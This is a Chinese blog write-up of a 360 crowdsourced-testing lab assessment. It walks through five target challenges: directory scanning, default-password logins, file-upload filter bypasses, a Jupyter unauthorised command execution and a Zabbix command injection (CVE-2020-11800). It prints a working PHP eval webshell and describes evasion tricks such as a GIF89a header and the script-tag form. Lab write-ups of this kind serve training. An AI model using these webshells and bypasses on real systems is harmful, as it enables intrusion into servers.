记一次360众测靶场考核

记一次360靶场考核

第一轮理论题

百度搜答案即可= =

第二轮实战考核

第一题 拆旧有限公司

打开环境是一个公司官网

随便点了点没发现什么东西
别慌

扫一下目录,看看能不能扫到后台或者敏感路径之类的突破口

果然,直接扫到了后台

尝试了一下弱密码admin/admin888成功登录
发现是一个备份文件后台

通过抓包修改备份文件内容和文件名
这里尝试上传一句话

成功连接shell

第二题 图书馆公共网络存储网盘

打开环境是一个登录页面

发现它有一个”非注册用户上传文件“的功能

经过测试发现检测了文件头
所以这里用GIF89a来绕过文件头检测,
再次上传一句话时,发现还过滤了<?
决定用\<script\>标签php一句话木马来绕过<?的过滤。

<script language="php"> @eval($_POST['shell']); </script>

但怎么都不解析PHP

没有思路的时候,重新看了一遍上传功能

!!!!!突然发现
URL中存在文件包含

成功拿下

第三题

上传绕过方法与第二题一致就不过多叙述

第四题 WEB应用管理

jupyter的未授权访问远程命令执行
漏洞编号:SSV-99338
漏洞描述:管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令
执行系统命令

ovyan@1904042cf343:~$vyan@1904042cf343:~$ ls ../../ bin boot dev etc home KEY_10b6e8259961.txt lib lib64 media mnt opt proc root run sbin srv sys tmp usr var jovyan@1904042cf343:~$ cat /KEY_10b6e8259961.txt mozhe7addd24523b82e0e371b5f7c7dg

第五题 智谷运维管理系统

漏洞编号:CVE-2020-11800
Zabbix Server的trapper命令处理,
存在命令注入漏洞,可导致远程代码执行

弱口令登录后台admin/Zabbix




拿下

附:


__EOF__

本文作者LinkPoc
本文链接https://www.cnblogs.com/Y0uhe/p/15536492.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   LinkPoc  阅读(2390)  评论(0编辑  收藏  举报
编辑推荐:
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
阅读排行:
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
点击右上角即可分享
微信分享提示